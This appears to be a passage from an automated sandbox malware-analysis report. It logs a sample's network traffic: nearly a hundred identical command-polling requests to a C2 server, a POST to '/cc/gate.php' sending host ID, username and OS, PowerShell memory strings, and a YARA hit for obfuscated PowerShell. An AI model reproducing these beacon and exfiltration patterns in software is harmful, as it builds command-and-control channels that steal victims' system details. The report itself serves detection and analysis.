            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: unknownDNS traffic detected: queries for: cutt.ly
            Source: unknownHTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheData Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
            Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: powershell.exe, 0000000E.00000002.2115049708.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.c
            Source: powershell.exe, 00000007.00000002.2117026131.000000000020A000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanenTZ
            Source: powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: powershell.exe, 00000007.00000002.2116902605.00000000001DE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: dump.pcap, type: PCAPMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
